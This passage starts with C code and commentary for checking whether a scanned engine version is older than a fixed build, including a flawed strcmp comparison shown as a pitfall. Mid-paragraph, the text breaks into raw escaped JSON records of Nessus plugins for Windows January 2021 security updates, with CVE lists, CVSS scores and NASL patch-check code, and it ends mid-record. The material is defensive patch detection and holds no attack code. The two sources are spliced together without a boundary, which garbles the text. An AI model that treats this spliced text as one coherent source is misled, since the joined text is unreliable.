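        if (a[i] < b[i]) return -1;
        if (a[i] > b[i]) return 1;
    }
    return 0;
}

/* 1 = engine older than the fixed build (report it), 0 = fixed or newer,
 * -1 = version string unparsable (report that on its own, never as "fixed"). */
int mmpe_is_vulnerable(const char *engine_version)
{
    unsigned long v[VER_PARTS];
    if (parse_version(engine_version, v) != 0) return -1;
    return compare_version(v, MMPE_FIXED) < 0 ? 1 : 0;
}

/* The pitfall: plain strcmp orders "1.1.9000.1" after "1.1.17700.4" because
 * '9' > '1', so an old engine is reported as fixed. */
int naive_is_vulnerable(const char *engine_version)
{
    return strcmp(engine_version, "1.1.17700.4") < 0 ? 1 : 0;
}

int main(void)
{
    /* Constructed sample values, as a scanner might read them from a host. */
    const char *samples[] = { "1.1.17600.5", "1.1.17700.4", "1.1.17800.5",
                              "1.1.9000.1", "1.1.17700", "1.1.17700.4beta" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-16s numeric=%2d  strcmp=%2d\n", samples[i],
               mmpe_is_vulnerable(samples[i]), naive_is_vulnerable(samples[i]));
    return 0;
}
```

The parser deliberately returns a distinct failure value instead of treating an unreadable version as "not vulnerable": an inventory record with an empty or malformed engine version is a host that still needs a manual look, which is also why the Nessus plugins exit early when they cannot read the engine version rather than reporting the host clean.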
An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598297: Windows Server 2012 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2020-17087", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598278.NASL", "href": "https://www.tenable.com/plugins/nessus/144881", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144881);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/01\");\n\n script_cve_id(\n \"CVE-2020-17087\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598278\");\n script_xref(name:\"MSKB\", value:\"4598297\");\n script_xref(name:\"MSFT\", value:\"MS21-4598278\");\n script_xref(name:\"MSFT\", value:\"MS21-4598297\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598297: Windows Server 2012 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n # https://support.microsoft.com/en-us/help/4598278/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bbb76f59\");\n # https://support.microsoft.com/en-us/help/4598297/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b71d9485\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598297 or Cumulative Update KB4598278.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598278', '4598297'); # changed by manual execution of PT scriptsautomation\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598297, 4598278])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-21T13:45:31", "description": "The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. 
An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-1679)", "edition": 4, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598287: Windows Server 2008 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1699", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598287.NASL", "href": "https://www.tenable.com/plugins/nessus/144878", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144878);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/20\");\n\n script_cve_id(\n \"CVE-2021-1649\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\"\n );\n script_xref(name:\"MSKB\", value:\"4598287\");\n script_xref(name:\"MSKB\", value:\"4598288\");\n script_xref(name:\"MSFT\", value:\"MS21-4598287\");\n script_xref(name:\"MSFT\", value:\"MS21-4598288\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598287: Windows Server 2008 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598287\nor cumulative update 4598288. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1649, CVE-2021-1652, CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659,\n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693,\n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702,\n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\");\n # https://support.microsoft.com/en-us/help/4598287/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71567e2d\");\n # https://support.microsoft.com/en-us/help/4598288/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9cddaa00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598287 or Cumulative Update KB4598288.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1706\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598287', '4598288');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598287, 4598288])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1664", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598275.NASL", "href": "https://www.tenable.com/plugins/nessus/144888", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144888);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1688\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598285\");\n script_xref(name:\"MSKB\", value:\"4598275\");\n script_xref(name:\"MSFT\", value:\"MS21-4598285\");\n script_xref(name:\"MSFT\", value:\"MS21-4598275\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598285/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598275/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598275 or Cumulative Update KB4598285.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598275',\n '4598285'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598275, 4598285])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:53:37", "description": "The remote Windows host is missing security update 4598289\nor cumulative update 4598279. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
